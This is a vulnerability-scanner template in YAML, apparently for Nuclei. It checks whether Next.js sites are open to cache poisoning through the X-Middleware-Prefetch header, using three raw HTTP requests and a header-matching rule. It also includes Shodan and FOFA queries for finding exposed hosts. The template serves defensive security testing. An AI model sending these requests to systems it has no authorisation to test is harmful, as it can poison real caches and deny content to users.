id: nextjs-middleware-cache

info:
  name: Next.js - Cache Poisoning
  author: DhiyaneshDk
  severity: high
  description: |
     Next.js is vulnerable to Cache Poisoning using X-Middleware-Prefetch.
  reference:
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
  metadata:
    verified: true
    vendor: vercel
    product: next.js
    framework: node.js
    shodan-query:
      - http.html:"/_next/static"
      - cpe:"cpe:2.3:a:zeit:next.js"
    fofa-query: body="/_next/static"
  tags: nextjs,cache

variables:
  rand: "{{rand_text_numeric(5)}}"

http:
  - raw:
      - |
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}
        X-Middleware-Prefetch: 1
        Priority: u=1

      - |
        @timeout: 10s
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}
        X-Middleware-Prefetch: 1
        Priority: u=1

      - |
        @timeout: 10s
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains(all_headers_2, 'X-Middleware-Skip: 1') && !contains(cache_control_2, 'no-cache') && !contains(pragma_2, 'no-cache')"
          - "status_code_3 == 200 && contains(all_headers_3, 'X-Middleware-Skip: 1') && !contains(cache_control_3, 'no-cache') && !contains(pragma_3, 'no-cache')"
        condition: and
# digest: 4b0a004830460221008f5bf3e8be8e67a68c80785161dccd474c56dbeba4e37ce63db451c3e75c5f10022100aaa3edd2d1133ae1fce585e2d1e73a6ccaedd166b721e5e0db2c20b80ac110ad:922c64590222798bb761d5b6d8e72950